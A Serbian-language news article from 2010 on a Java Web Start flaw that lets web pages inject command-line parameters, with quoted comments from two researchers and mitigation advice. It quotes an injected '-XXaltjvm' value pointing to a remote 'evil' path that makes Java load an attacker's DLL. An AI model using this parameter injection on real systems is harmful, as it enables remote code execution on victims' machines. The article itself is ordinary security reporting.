Ozbiljan propust u novoj verziji Java pogađa sve aktuelne verzije Windows-a

Vesti, 12.04.2010, 01:37 AM

Postoji ranjivost u Java koja predstavlja ozbiljan problem jer ostavlja korisnike svih aktuelnih verzija Windows-a otvorenim za napade koji mogu dovesti do potpunog kompromitovanja pogođenog sistema. Dva istraživača su nezavisno jedan od drugog u petak objavili informacije o ranjivosti, tvrdeći da je ova ranjivost prisutna u okviru Java godinama unazad.

Problem leži u Java Web Strat framework, tehnologiji koju je razvio Sun Microsystems kako bi se omogućila jednostavnija primena Java aplikacija. U suštini, JavaWS tehnologija ne proverava parametre koje dobija od komandne linije, pa napadači mogu kontolisati ove parametre korišćenjem posebnih HTML oznaka na web strani, rekao je Ruben Santamarta u svom članku objavljenom u petak.

Tavis Ormandy je istog dana objavio svoj tekst o ovom nedostatku u Full Disclosure mailing list-u. Ormandy smatra da deaktiviranje Java dodatka nije dovoljno za prevenciju eventualnog iskorišćavanja ovog propusta, zbog toga što je ranjivi deo zasebno instaliran.

Ukratko, ukoliko imate poslednju verziju Java na svom kompjuteru, možete se smatrati pogođenim ovim propustom.

„Java.exe i javaw.exe podržavaju nepisani sakriveni parametar komandne linije „-XXaltjvm" i "-J-XXaltjvm" (videti -J switch u javaws.exe). Ovo upućuje Java da učita alternativnu JavaVM biblioteku (jvm.dll ili libjvm.so) sa željene putanje (path). Igra je završena. Možemo setovati -Xxaltjvm=\\IP\evil, na ovaj način javaw.exe će učitati naš loš jvm.dll. Bye, bye ASLR, DEP...“, piše Santamarta.

S obzirom da JavaWS tehnologija uključuje Java Runtime okruženje, koje se koristi u većini browser-a, ranjivost pogađa sve ove programe, uključujući Firefox, Internet Explorer i Chrome, na svim verzijama Windows-a, počev od Windows 2000 do Windows 7, tvrdi Santamarta. Browseri koji rade na Apple-ovom Mac OS X nisu ovim pogođeni.

U svom članku Ormandy kaže da je obavestio Sun o ovoj ranjivosti ali da proizvođač nije poverovao da je problem dovoljno ozbiljan i da zahteva urgentnu zakrpu.

„Programske alatke omogućavaju samo minimum provere URL parametara, dopuštajući nam dodavanje proizvoljnih parametara javaws programu, što obezbeđuje dovoljnu funkcionalnost preko komandne linije dozvoljavajući ovoj grešci da bude iskorišćena. Lakoća sa kojom ova greška može biti otkrivena uverila me je da je objavljivanje ovog dokumenta u najboljem interesu svih nas osim proizvođača,” kaže dalje u svom članku Ormandy.

Ovaj problem se može izbeći deaktiviranjem JavaWS i Java.exe, kaže Santamarta u svom postu.

Julien Tinnes daje dodatne informacije o ovoj vrsti Java ranjivosti.

Izvor: http://threatpost.com/en_us/blogs/serious-new-java-flaw-affects-all-browsers-040910


Prijavite se na našu mailing listu i primajte najnovije vesti (jednom dnevno) putem emaila svakog radnog dana besplatno:

Izdvojeno

Google Chrome ima nova, jasnija upozorenja za opasne fajlove koje preuzimate sa interneta

Google Chrome ima nova, jasnija upozorenja za opasne fajlove koje preuzimate sa interneta

Google Chrome će vas od sada upozoravati kada preuzimate rizične fajlove zaštićene lozinkom i prikazivati vam upozorenja sa više informacija o p... Dalje

Na Telegramu objavljena cela baza podataka hakerskog sajta BreachForums v1

Na Telegramu objavljena cela baza podataka hakerskog sajta BreachForums v1

Cela baza podataka zloglasnog hakerskog foruma, BreachForums v1, objavljena je na Telegramu u utorak uveče. Ona sadrži obilje podataka, uključujuc�... Dalje

Posle mnogo odugovlačenja, Google odustao od planova o ukidanju kolačića trećih strana u Chrome pretraživaču

Posle mnogo odugovlačenja, Google odustao od planova o ukidanju kolačića trećih strana u Chrome pretraživaču

Google je odustao od planova o postepenom ukidanju kolačića za praćenje trećih strana u svom Chrome veb pretraživaču skoro tri meseca nakon n... Dalje

Budite oprezni: U oglasima na Facebooku za GTA VI Beta verziju krije se malver

Budite oprezni: U oglasima na Facebooku za GTA VI Beta verziju krije se malver

Fanovi GTA upozoreni su na lažne oglase za preuzimanje GTA VI Beta koji su se pojavili na društvenim mrežama. Rockstar Games, koji stoji iza GTA, n... Dalje

Sajber kriminalci iskoristili haos koji je u petak izazvao CrowdStrike za širenje malvera Remcos RAT

Sajber kriminalci iskoristili haos koji je u petak izazvao CrowdStrike za širenje malvera Remcos RAT

Petak, 19. juli, ostaće upamćen po tehničkim problemima širom sveta, najvećim u novijoj istoriji, koji su bili posledica neuspelog ažuriranja so... Dalje